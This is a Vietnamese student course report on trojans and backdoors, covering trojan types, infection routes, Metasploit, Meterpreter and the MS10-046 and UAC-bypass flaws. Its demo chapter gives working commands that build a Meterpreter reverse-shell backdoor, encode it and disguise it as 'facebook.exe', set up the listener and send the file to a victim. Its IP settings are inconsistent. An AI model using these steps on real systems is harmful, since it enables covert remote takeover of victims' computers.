Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor Đề tài nghiên cứu khoa học

Cùng với sự phát triển của công nghệ thông tin, công nghệ mạng máy tính và sự phát triển của mạng Internet thì các dịch vụ mạng đã có mặt trong hầu hết các lĩnh vực của đời sống xã hội. Các thông tin trên Internet cũng đa dạng về nội dung và hình thức, trong đó có rất nhiều thông tin cần được bảo mật cao hơn bởi tính kinh tế, tính chính xác và độ tin cậy của nó. Bên cạnh sự ra đời và phát triển của công nghệ An ninh Mạng, các hình thức phá họa mạng cũng trở nên tinh vi và phức tạp hơn. Do đó, đối với mỗi hệ thống, nhiệm vụ bảo mật được đặt ra cho người quản trị mạng là hết sức quan trọng và cần thiết. Xuất phát từ những thực tế đó, nhóm chúng em đã tìm hiểu đề tài “Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor” để có thể đưa cái nhìn tổng quan về loại mã độc hại này, từ đó phát triển sang các hướng sâu hơn về mã độc hại nói chung.

HỌC VIỆN KỸ THUẬT MẬT MÃ KHOA AN TOÀN THÔNG TIN

MÔN HỌC: CƠ SỞ AN TOÀN THÔNG TIN

Đề tài: Tìm hiểu và xây dựng chương trình

minh họa hoạt động của Backdoor

Giảng viên hướng dẫn : Vũ Đình Thu Nhóm thực hiện : Lã Thị Hậu

Bùi Thái Dương

Lê Anh Đức Nguyễn Tuấn Anh

AT8A-Tháng 9/2014

MỤC LỤC

MỤC LỤC 1

DANH MỤC HÌNH ẢNH 2

LỜI MỞ ĐẦU 3

CHƯƠNG I: TỔNG QUAN VỀ TROJAN VÀ BACKDOOR 4

1 Giới thiệu về Trojan - Backdoor 4

2 Các dạng và cách hoạt động của Trojan 4

3 Những con đường để máy tính nạn nhân nhiễm Trojan 5

4 Các Port sử dụng bởi các Trojan phổ biến 5

CHƯƠNG 2: SYSTEM HACKING 6

1 Giới thiệu về Metasploit 6

2 Sử dụng Metaspolit Frameworks 6

3 Payload Meterpreter 6

4 Các lỗi liên quan đến system hacking 7

CHƯƠNG 3: DEMO CHƯƠNG TRÌNH TẠO BACKDOOR VỚI METASPLOIT 8

1 Mục tiêu 8

2 Các bước thực hiện 8

KẾT LUẬN 11

TÀI LIỆU THAM KHẢO 12

Hình 3.1 Kiểm tra IP 8

DANH MỤC HÌNH ẢNH

LỜI MỞ ĐẦU

Cùng với sự phát triển của công nghệ thông tin, công nghệ mạng máy tính và sự phát triển của mạng Internet thì các dịch vụ mạng đã có mặt trong hầu hết các lĩnh vực của đời sống xã hội Các thông tin trên Internet cũng đa dạng về nội dung và hình thức, trong đó có rất nhiều thông tin cần được bảo mật cao hơn bởi tính kinh tế, tính chính xác

và độ tin cậy của nó

Bên cạnh sự ra đời và phát triển của công nghệ An ninh Mạng, các hình thức phá họa mạng cũng trở nên tinh vi và phức tạp hơn Do đó, đối với mỗi hệ thống, nhiệm vụ bảo mật được đặt ra cho người quản trị mạng là hết sức quan trọng và cần thiết Xuất phát

từ những thực tế đó, nhóm chúng em đã tìm hiểu đề tài “Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor” để có thể đưa cái nhìn tổng quan về loại mã độc hại này, từ đó phát triển sang các hướng sâu hơn về mã độc hại nói chung

CHƯƠNG I: TỔNG QUAN VỀ TROJAN VÀ BACKDOOR

1 Giới thiệu về Trojan - Backdoor

- Một Trojan là một chương trình nhỏ chạy chế độ ẩn và gây hại cho máy tính

- Với sự trợ giúp của Trojan, một kẻ tất công có thể dễ dàng truy cập vào máy tính của nạn nhân để thực hiện một số việc nguy hại như lấy cắp dữ liệu, xóa file, và nhiều khả năng khác

- Khái niệm Backdoor được dùng để chỉ những phần mềm độc hại, được tạo ra để cài, phát tán mã độc vào máy tính người của người dùng

- Nếu xét về khía cạnh chức năng và kỹ thuật, Backdoor khá giống với hệ thống quản lý và điều phối phần mềm Những ứng dụng độc hại này được tạo ra để làm bất cứ yêu cầu gì mà tin tặc muốn: gửi và nhận dữ liệu, kích hoạt, sử dụng và xóa bất cứ file nào

đó, hiển thị thông báo lỗi, tự khởi động lại máy tính …

- Những chương trình như này thường được sử dụng để liên kết những nhóm máy tính bị lây nhiễm để tạo nên mô hình mạng botnet hoặc zombie thường gặp Và những kẻ đứng đằng sau tổ chức này có thể dễ dàng tập trung 1 số lượng lớn hoặc rất lớn các máy tính – lúc này đã trở thành công cụ cho tin tặc, nhằm thực hiện những âm mưu hoặc mục đích xấu

- Một bộ phận khác của Backdoor cũng có khả năng lây lan và hoạt động giống hệt với Net-Worm, chúng ta có thể phân biệt chúng qua khả năng lây lan, Backdoor không thể tự nhân bản và lây lan, trái ngược hoàn toàn với Net-Worm Nhưng chỉ cần nhận được lệnh đặc biệt từ phía tin tặc, chúng sẽ đồng loạt lây lan và sản sinh với số lượng không thể kiểm soát được

2 Các dạng và cách hoạt động của Trojan

- Kẻ tấn công có thể truy cập được vào các máy tính đã bị nhiễm Trojan khi chúng Online

- Kẻ tấn công có thể truy cập và điều khiển toàn bộ máy tính của nạn nhân, và chúng có khả năng sử dụng vào nhiều mục đích khác nhau

- Các dạng Trojan cơ bản:

+ Remote Access Trojan – Cho kẻ tấn công kiểm soát toàn bộ hệ thống từ xa + Data-Sending Trojan – Gửi những thông tin nhạy cảm cho kẻ tấn công

+ Destructive Trojan – Phá hủy hệ thống

+ Denied-of-Service – DoS Attack Trojan: Trojan cho tấn công DoS

+ Proxy Trojan

+ HTTP, FTP Trojan: - Trojan tự tạo thành HTTP hay FTP server để kẻ tấn công khai thác lỗi

+ Security Software Disable Trojan – Có tác dụng tắt những tính năng bảo mật trong máy tính của nạn nhân

- Mục đích của những kẻ viết ra những Trojans:

+ Lấy thông tin của Credit Card

+ Lấy thông tin của các tài khoản cá nhân như: Email, Password, Usernames,… + Những dữ liệu mật

+ Thông tin tài chính: Tài khoản ngân hàng…

+ Sử dụng máy tính của nạn nhân để thực hiện một tác vụ nào đó, như để tấn công, scan, hay làm ngập hệ thống mạng của nạn nhân

3 Những con đường để máy tính nạn nhân nhiễm Trojan

- Qua các ứng dụng CHAT online như IRC – Interney Relay Chat

- Qua các file được đính kèm trên Mail…

- Qua tầng vật lý như trao đổi dữ liệu qua USB, CD, HDD

- Khi chạy một file bị nhiễm Trojan

- Qua NetBIOS – FileSharing

- Qua những chương trình nguy hiểm

- Từ những trang web không tin tưởng hay những website cung cấp phần mềm miễn phí tràn lan trên mạng

- Nó có khả năng ẩn trong các ứng dụng bình thường, khi chạy ứng dụng đó lập tức cũng chạy luôn Trojan

4 Các Port sử dụng bởi các Trojan phổ biến

- Back Orifice – Sử dụng UDP protocol – Sử dụng Port 31337 và 31338

- Deep Throat – Sử dụng UDP protocol – Sử dụng Port 2140 và 3150

- NetBus – Sử dụng TCP Protocol – Sử dụng Port 12345 và 12346

- Whack-a-mole – Sử dụng TCP – Qua Port 12361 và 12362

- Netbus 2 Pro – Sử dụng TCP – Qua Port 20034

- GirlFriend - Sử dụng Protocol TCP – Qua Port 21544

CHƯƠNG 2: SYSTEM HACKING

1 Giới thiệu về Metasploit

- Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thâm nhập và phát triển hệ thống phát hiện tấn công mạng Một dự án con rất nổi tiếng của Metasploit là Metasploit Framework

- Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS

- Metasploit gồn 4 thành phần cơ bản là:

+ Console interface: dùng lệnh msfconsole Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn

+ Web interface: Dùng msfweb giao tiếp với người dùng thông qua giao diện web

+ Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits

+ Temporary Enviroment: được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác

2 Sử dụng Metaspolit Frameworks

Các bước được thực hiện tuần tự như sau:

- Chọn module exploit

- Cấu hình exploit đã chọn

- Kiểm tra những cấu hình vừa thiết lập

- Lựa chọn mục tiêu

- Lựa chọn Payload

- Thực thi exploit

3 Payload Meterpreter

- Meterpreter, viết tắt từ Meta-Interpreter là một payload nâng cao có trong Metasploit Framework Mục đích của nó là để cung cấp những tập lệnh để khai thác, tấn công các máy remote computers Nó được viết từ các developers dưới dạng shared object (DLL) files Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus

4 Các lỗi liên quan đến system hacking

- Lỗi MS10-046 (2286198):

+ Đây là một lỗi rất nghiêm trọng liên quan đến Windows Shell của cho tất cả các hệ điều hành bị ảnh hưởng, cho phép kẻ tấn công chiếm lấy toàn quyền điều khiển Windows và thực thi mã nguồn từ xa Lỗi này được phát hiện vào tháng 06/2010 và đến tháng 08/2010, Microsoft tung ba bản vá lỗi

+ Lỗi nguy hiểm này nằm trong các tập tin "shortcut" (*.lnk) của Windows, các tập tin này thường nằm ở giao diện desktop hay trình đơn Start Bằng cách tạo ra một tập tin shortcut nhúng mã độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một thư mục chứa tập tin shortcut nhúng mã độc

- Lỗi BYPASSUAC:

+ Từ Windows Vista trở về sau, Microsoft đã giới thiệu một tiện ích được xây dựng sẵn là User Access Control (UAC) UAC làm tăng tính bảo mật của Windows bằng cách giới hạn các phần mềm ứng dụng của nhóm quyền người sử dụng cơ bản Vì vậy, chỉ những phần mềm được người dùng tin tưởng mới nhận được quyền quản trị, những phần mềm khác thì không Tuy nhiên, với tài khoản của người quản trị, các ứng dụng vẫn bị giới hạn như những tài khoản thường khác

+ Các hệ điều hành có tích hợp sẵn User Access Control điều bị ảnh hưởng và

có thể khai thác

CHƯƠNG 3: DEMO CHƯƠNG TRÌNH TẠO BACKDOOR VỚI

METASPLOIT

1 Mục tiêu

- Công cụ sử dụng: Backtrack 5 R3

- Mục tiêu: Sử dụng Backdoor để Remote Windows, dựa trên nguyên lý hoạt động của Backdoor

2 Các bước thực hiện

acktrack là 192.168.1.2

Hình 3.1: Kiểm tra IP

- Bước 2: Tạo Backdoor

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/facebook.exe

Hình 3.2: Tạo Backdoor Trong đó:

- Bước 3: Lắng nghe chờ đợi kết nối

+ Chuyển đến thư mục chứa framework của Metasploit, mở màn hình console

để thao tác lệnh

cd /pentest/exploits/framework3 msfconsole

Hình 3.3: Màn hình console của exploit + Thao tác mở cổng, lắng nghe kết nối

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.2

set LPORT 4444

set channel 1 exploit

Hình 3.4: Thao tác mở cổng, chờ kết nối

- Bước 4: Gửi file sang máy nạn nhân

Hình 3.5: File trên máy nạn nhân

- Bước 5: Khi máy nạn nhận thực thi file, kết nối sẽ được thiết lập

Hình 3.6: Kết nối được thiết lập

- Bước 6: Thi hành vài quyền kiểm soát cơ bản

Hình 3.7: Kết quả thực thi trên máy nạn nhân

KẾT LUẬN

Qua việc nghiên cứu và tìm hiểu đề tài, chúng ta có thể hiểu hơn về các mối đe dọa

về an toàn thông tin, cũng như biết thêm về một trong những kỹ thuật tấn và bảo vệ cho

hệ thống Trên cơ sở đó, đề tài có thể mở rộng hướng phát triển theo nhiều hướng khác nhau, đi sâu hơn về các loại mã độc cụ thể hay khai thác các công cụ bảo mật khác

Sau khi nghiên cứu tiểu luận môn học này, nhóm sẽ cố gắng khắc phục những vấn

đề tồn tại và mở rộng đề tài để có thể thiết thực hơn với công việc học tập và việc sử dụng máy tính rộng rãi như hiện nay

TÀI LIỆU THAM KHẢO

- Tấn công và Bảo vệ hệ thống – I Train (Tocbatdat)

- Backtrack 5 Basic Tutorial – Athena Academy

- “Tấn công bằng mã độc” – Trương Minh Nhật Quang (Security BootCamp)

- “Viruses” - Client Services – IT Education and Training Team